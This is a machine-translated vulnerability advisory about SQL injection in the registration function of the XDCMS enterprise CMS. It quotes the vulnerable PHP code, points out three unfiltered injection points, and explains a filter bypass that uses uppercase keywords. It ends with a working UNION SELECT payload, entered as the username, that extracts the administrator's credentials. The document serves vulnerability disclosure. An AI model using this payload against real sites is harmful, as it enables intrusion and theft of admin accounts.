xdcms a registered user of the SQL injection vulnerability analysis-vulnerability warning-the black bar safety net

2014-01-03T00:00:00
ID MYHACK58:62201441641
Type myhack58
Reporter xfkxfk
Modified 2014-01-03T00:00:00

Description

The latest version XDCMS enterprise management system, since the filter is not strict, you can bypass the limit, resulting in a number ofSQL injection

Injection in XDCMS enterprise management system registration function, see\system\modules\member\index. php file:

Registration will be called register_save, the problem lies in the index. php register_save function:

public function register_save(){

$username=safe_html($_POST['username']);//get the UserName, here safe_html function to filter

$password=$_POST['password'];

$password2=$_POST['password2'];

$fields=$_POST['fields'];

if(empty($username)||empty($password2)||empty($password)){

showmsg(C('material_not_complete'),'-1');

}

if(! strlength($username,5)){

showmsg(C('username'). C('str_len_error').' 5','-1');

}

if(! strlength($password,5)){

showmsg(C('password'). C('str_len_error').' 5','-1');

}

if($password!=$ password2){

showmsg(C('password_different'),'-1');

}

$password=md5(md5($password));

$user_num=$this->mysql->num_rows("select * from ". DB_PRE."member where username='$username'");//determine whether the members present, where the UserName may be bypassing the filter, causing the injection, this is the first of theSQL injection

if($user_num>0){

showmsg(C('member_exist'),'-1');

}

$ip=safe_replace(safe_html(getip()));

$this->mysql->db_insert('member',"username='".$ username."',password='".$ password."',creat_time='". datetime()."',last_ip='".$ ip."',is_lock='0',logins='0',groupid='1'");//Insert the main fields-Username, Password, where the UserName agreed to cause injection, the second atsql injection

$last_id=$this->mysql->insert_id();

//Insert the Subsidiary field

$field_sql=";

foreach($fields as $k=>$v){

$f_value=$v;

if(is_array($v)){

$f_value=implode(',',$v);

}

$field_sql.=",{$k}='{$f_value}'";//here there is no filter, directly into the following update sql statement, resulting in a third placesql injection

}

$field_sql=substr($field_sql,1);

$field_sql="update ". DB_PRE."member set {$field_sql} where userid={$last_id}";

$query=$this->mysql->query($field_sql);

showmsg(C('register_success'),'index. php? m=member&f=register');

}

The first of thesql injection, the registration of a user, and then the capture of:

Finally look at the results, and successfully got the management Username Password:

In the safe_html at although had aSQL injectionis sensitive to the word, and also filter=and, but did not considerSQL injectionsensitive to the word case, where the only filter lowercase, so we use uppercase to bypass, and here the filter of=and, we can use without the*and the=conventional saveSQL injectionstatement, EXP is as follows:

In the UserName at the input:

‘ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT

count(1),concat(round(rand(0)),(SELECT concat(username,0×2 3,password) FROM

c_admin LIMIT 0,1))a FROM information_schema. tables GROUP by a)b#

Author: xfkxfk